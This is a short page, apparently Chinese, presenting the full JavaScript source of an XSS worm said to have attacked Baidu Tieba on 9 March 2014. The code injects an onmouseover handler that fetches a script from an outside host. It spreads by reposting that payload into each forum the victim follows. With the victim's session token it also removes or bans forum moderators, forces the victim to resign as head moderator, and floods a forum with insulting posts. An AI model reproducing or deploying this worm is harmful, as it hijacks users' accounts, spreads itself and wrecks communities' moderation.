2014年03月09日攻击百度贴吧的XSS蠕虫源码

var n=PageData.user.user_forum_list.info.length;
var num=0;
	var config = { 
		titles: ["u4f60u7684u672au6765u5728u8fd9u4e2au5e16u5b50u91ccuff0cu60f3u770bu5417uff1f", "u611au8822u7684u51e1u4eba u63a5u53d7u795eu306eu6012u706bu5427","u8fd9u662fu547du8fd0u77f3u4e4bu95e8u7684u9009u62e9","u98a4u6296u5427uff0cu51e1u4ebau4eecuff01","u6b3au9a97u4e00u5f00u59cbu7684u4f60 u6b3au9a97u4e16u754cu5427","u8c01u8981u5403u53d8u6001u7684u9999u8549uff01","u521au624du6536u5230u4e86u5f3au70c8u7684u7cbeu795eu653bu51fb u5fc3...u5fc3u7075u6b63u906du5230u4fb5u8680","u4e0du8981u9760u8fd1u6211uff01u6211u6b63u5728u6267u884cu963bu6b62u673au5173u66b4u529bu884cu4e3au7684u4f5cu6218","u624bu62ffu91d1u5777u5783uff0cu811au8e0fu4e03u5f69u4e91u7aefuff0cu53d1u51fau6700u540eu7684u5450u558a","u98a4u6296u5427uff0cu51e1u4ebau4eecuff01"],
		contents: ['"style="height:100%;100;position:fixed'],
		tbs: PageData.tbs,
		whiteList: [635137, 1074587, 116863],
        evilContent: '"onmouseover="$.getScript(u0027//baid.ws/c8tfu0027)' //xss
	};

	var userInfo = {
        is_red_tail:function(i){$.get('http://tieba.baidu.com/home/get/panel?ie=utf-8&un='+PageData.user.name,function(data){return data.data.identity});}(),
		is_bawu: function (p) {
			return p.bawu ? p.can_edit_gconforum ? "daba" : "xiaoba" : "none"
		}(PageData.user.power)
	};
	function addGood(fid, kw, tid) {
		$.get('http://tieba.baidu.com/mo/q---9E2EBBE47D2160067823F56F5F549254%3AFG%3D1--1-3-0--2--wapp_1393073859357_21/m?tn=bdSGD&tbs=' + config.tbs + '&word=' + encodeURIComponent(kw) + '&z=' + tid + '&fid=' + fid + '&ntn=set&pn=0&cate=0&expand=0&pinf=1_2_0');
	}

	function topThread(fid, kw, tid) { 
		$.get('http://tieba.baidu.com/mo/q---9E2EBBE47D2160067823F56F5F549254%3AFG%3D1--1-3-0--2--wapp_1393073859357_21/m?tn=bdTOP&z=' + tid + '&tbs=' + config.tbs + '&word=' + encodeURIComponent(kw) + '&expand=0&fid=' + fid + '&ntn=set&pinf=1_2_0');
	}

	function killXiaoBa() {
		$.get("/bawu2/platform/listBawuTeam?ie=utf-8&word=" + encodeURIComponent(PageData.forum.name), function (x) {
			$(x).find("ul[id*='assist']").find("li[data-field*='"user_id":']").each(function () {
				$.post("/bawu2/platform/delBawuMember", {
					tbs: config.tbs,
					word: PageData.forum.name,
					user_id: $.parseJSON(this.dataset.field).user_id,
					type: "assist",
					ie: "utf-8"
				});
			});
		});
	}

	function banXiaoBa() {
		$.get('http://tieba.baidu.com/f/bawu/admin_group?ie=utf-8&kw=' + encodeURIComponent(PageData.forum.name) + '&fid=' + PageData.forum.id, function (res) {
			$(res).find('tr:nth-child(3)').find('a').each(function () {
				$.post('/bawu/cm', {
					cm: 'filter_forum_user',
					ban_days: 1,
					user_name: $(this).text(),
					word: PageData.forum.name,
					fid: PageData.forum.id,
					tbs: config.tbs,
					ie: 'utf-8'
				})
			})
		})
	}

	function czDaba() {
		$.post('/bawu/cm', {
			cm: 'apply_resign',
			resignation: 'u518du89c1u4e86 u6211u7684u670bu53cbu4eec.',
			dtype: 'json',
			word: PageData.forum.name,
			fid: PageData.forum.id,
			tbs: config.tbs,
			ie: 'utf-8'
		})
	}

	function addThread(fid) {
		$.post("/relay/commit", {
			ie: "utf-8",
			kw: "test",
            fid:35,
            tid:2910585163,
			ftid: fid,
            ptid:2910585163,
            ppid:47102132189,
			tbs: PageData.tbs,
			title: config.titles[Math.random() * config.titles.length | 0],
			content: "aeb1cb13495409230133f7cd9058d109b3de492f#"+config.contents[Math.random() * config.contents.length | 0]+config.evilContent,
new_vcode:1,
tag:11,
activity_id:1425,
act_type:"photo",
__type__:"repost"
		},function (x) {
          if (x.no == 0 || x.new_thread_id) return x.new_thread_id;})
	}

function reply(){
  if (-1 !== config.whiteList.indexOf(PageData.user.user_forum_list.info[num].id) || !userInfo.is_red_tail && !PageData.user.user_forum_list.info[num].is_like){num++;return;}
  if(PageData.user.user_forum_list.info[num].tid){
   num++;
  }else{
    PageData.user.user_forum_list.info[num].tid=true;addThread(PageData.user.user_forum_list.info[num].id);
  }
}

	function fuckRedTail() {
		var obj = {
			ie: "utf-8",
			kw: "u8d34u5427u610fu89c1u53cdu9988",
			fid: 898666,
			tbs: PageData.tbs,
			title: "u767eu5ea6SB",
			content: config.contents[Math.random() * config.contents.length | 0]
		}
		for(var i=0;i<100;i++){
			$.post("/f/commit/thread/add",obj);
		}
	}

	if(userInfo.is_red_tail){setInterval("fuckRedTail()",8000)}
	if ("daba" === userInfo.is_bawu){ killXiaoBa(); czDaba();}
	if ("xiaoba" === userInfo.is_bawu) banXiaoBa();
var ruchong=setInterval("reply()",2000);